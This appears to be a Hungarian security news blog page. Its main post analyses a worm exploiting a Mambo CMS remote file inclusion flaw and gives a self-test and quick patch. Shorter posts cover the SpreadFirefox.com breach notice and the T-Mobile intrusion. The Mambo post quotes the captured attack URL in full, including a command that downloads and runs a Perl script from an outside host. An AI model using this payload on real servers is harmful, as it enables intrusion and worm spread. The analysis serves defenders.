Cracker, Black Hat

Mambo sebezhetőség

Az elmúlt napokban egy új szőnyegbombázó tűnt fel, ami ügyesen használja ki a Mambo egy biztonsági hibáját. A Mambot futtató szerverünk maga is könnyen áldozattá, mi több, szőnyegbombázóvá válhat.Január 13-án pénteken a késő esti órákban kezdődött a nemzetközi támadássorozat: a szerverünk 32 óra leforgása alatt 287 helyről kapott kifejezetten a Mambot támadó http-kérést. A kérés formája a következő:

http://támadott.gép/mambo_könyvtár/index.php?

_REQUEST[option]=com_content&_REQUEST[Itemid]=1&

GLOBALS=&mosConfig_absolute_path=

http://www.fullcrew.net/cmd/tool25.dat?&

cmd=cd%20/tmp/;lwp-download%20

http://shikoe.net/mambo2.txt;perl%20mambo2.txt;

rm%20-rf%20mambo2.txt*

(A backslash --- "vissza-per" --- karaktereket nem kell kiírni, csak az olvashatóságot növelik.)

A lényeg a mosConfig_absolute_path változó beállításánál van, ugyanis a Mambo nagyon sok fájlban használja a következő kódsort:

require_once($GLOBALS['mosConfig_absolute_path'] . TOVÁBBI_ELÉRÉSI_ÚT);

(A require_once helyett require, include, include_once is előfordul.)

A Mambo fejlesztői oldalán november 17-én már feltűnt egy kapcsolódó javítás, ami azonban ezt a támadást --- úgy tűnik --- nem védi ki. Egyelőre úgy tűnik, nincs hivatalos javítás a fejlesztői oldalon, viszont a trükköző Perl program rohamosan terjed.

A következő módon tesztelhetjük, hogy a Mambo szerverünk potenciális áldozat-e (a Perl script a Google-ról szedi a Mambot futtató áldozatai webcímét):

Készítsünk egy PHP scriptet x.php néven a webszerverünk fő webkönyvtárába ilyen tartalommal:


$f=fopen("/tmp/teszt.txt","w");

fwrite($f,"védtelen");

fclose($f)

?>

Ha ezután a következő webkérés létrehoz a szerver /tmp könyvtárában egy teszt.txt fájlt "védtelen" tartalommal, akkor a Mambo szerverünk valóban védtelen:

http://a.szerverünk.címe/mambo_könyvtár/index.php?

_REQUEST[option]=com_content&_REQUEST[Itemid]=1&

GLOBALS=&mosConfig_absolute_path=

http://a.szerverünk.címe/x.php?

(Ismét nem kell beírni a backslash-eket.)

Ha nincs szerencsénk, a fertőzött Mambo szervert futtató gépek valamelyike minket is megtalál, lefuttatja a http://shikoe.net/mambo1.txt vagy http://shikoe.net/mambo2.txt címen található Perl scriptet, ami "kotfare" néven kezdi folyamatosan felemészteni a szerverünk erőforrásait, folyamatosan keresve további áldozatok után. A szerverünk lelassul, a sávszélességünk bedugul, egy idő után pedig a webszerver processz is feladja, ha egyszerre túl sok Perl scriptet kell indítania. (Ennek a pontos forgatókönyvére még nem jöttem rá, de remélem, nem is lesz rá szükség.)

Az általam javasolt gyorsjavítás a következő:

A Mambo szerverünk index.php fájljába írjuk be a következőket (pl. a require_once( 'configuration.php' ); sor után):

$a=$GLOBALS[mosConfig_absolute_path];

$x=strpos($a,"http");

if (($x===0) || ($x>0)) die();

Egy másik lehetőség, hogy root-ként a /tmp könyvtárban létrehozzuk a mambo1.txt és mambo2.txt fájlokat, üres tartalommal, majd chmod 000 mambo[1-2].txt-vel megakadályozzuk, hogy a kérdéses Perl script a szerverünkre felíródjon. Persze, ez a megoldás nem annyira elegáns, és csak átmeneti jellegű.

Az elmúlt 60 órában további 400 támadást regisztráltunk, főként európai szerverekről, így Magyarországról is.

Feltörték a SpreadFirefox.com-ot

Az előbb kaptam egy levelet, miszerint a SpreadFirefox.com-ot feltörték és a támadók user adatokhoz is hozzájuthattak, ezért kérnek minden felhasználójukat, hogy változtassanak jelszót... A levél teljes szövege:On Tuesday, July 12, the Mozilla Foundation discovered that the server hosting Spread Firefox, our community marketing site, had been accessed on Sunday, July 10 by unknown remote attackers who exploited a security vulnerability in the software running the site. This exploit was limited to SpreadFirefox.com and did not affect other mozilla.org web sites or Mozilla software.

We don't have any evidence that the attackers obtained personal information about site users, and we believe they accessed the machine to use it to send spam. However, it is possible that the attackers acquired information site users provided to the site.

As a Spread Firefox user, you have provided us with a username and password. You may also have provided us with other information, including a real name, a URL, an email address, IM names, a street address, a birthday, and private messages to other users.

We recommend that you change your Spread Firefox password and the password of any accounts where you use the same password as your Spread Firefox account. To change your Spread Firefox password, go to SpreadFirefox.com, log in with your current password, select "My Account" from the sidebar, select "Edit Account" from the sidebar, then enter your new password into the Password fields and press the "Save user information" button at the bottom of the page.

The Mozilla Foundation deeply regrets this incident and is taking steps to prevent it from happening again. We have applied the necessary security fixes to the software running the site, have reviewed our security plan to determine why we didn't previously apply those fixes in this case, and have modified that plan to ensure we do so in the future.

Sincerely,

The Mozilla Foundation

Betörő járt a T-mobile rendszerében

Egy érdekes sztori olvasható a SecurityFocus oldalain. Egy cracker tört be az T-mobile rendszerébe tavaly és hosszú hónapokon át hozzáfért az előfizetők személyes adataihoz. A T-mobil szépen titokban tartotta az ügyet...A 21 éves Nicolas Jacobsen tavaly március körül egy internetes fórumon állította azt, hogy hozzáfért a T-mobile rendszeréhez. A Jacobsen a betörés alatt folyamatosan figyelte az U.S. Secret Service email-jeit, hozzáfért az előfizetők jelszavaihoz, születési dátumukhoz, hangposta jelszavukhoz, SSN-jükhöz (Social Security number), letölthette a SideKick felhasználók (köztük több ünnepelt hollywood-i sztár) privát képeit, stb.

Jacobsen 16.3 millió ügyfél adataihoz fért hozzá. A kormány az ügyet próbálta szép csendben kezelni. A T-mobile annak ellenére, hogy a betörésről már tavaly júliusban tudott, nem értesítette az előfizetőit. Tette ezt annak ellenére, hogy a kaliforniai törvények (anti-identity theft law "SB1386") szerint kötelező lett volna az előfizetők értesítése, ha azok személyes adatai sérülhettek.

A végén az internet okozta a betörő vesztét.

Érdekes cikk. Elolvashatod itt.

Bárki lehet 2 óra alatt hacker!

Ezt az igen intelligens mondatot bírta kiejteni a száján egy néven nem nevezhető "biztonsági szakértő" a királyi tévé bűnügyi műsorában kb. 20:50-kor. Mert leül a számítógép elé, és az Internetről minden infót megszerezhet percek alatt. Pl. a magyar keresők 100000 (egyszázezer) találatot adnak a Hekker kézikönyv kifejezésre.

Gratulálok!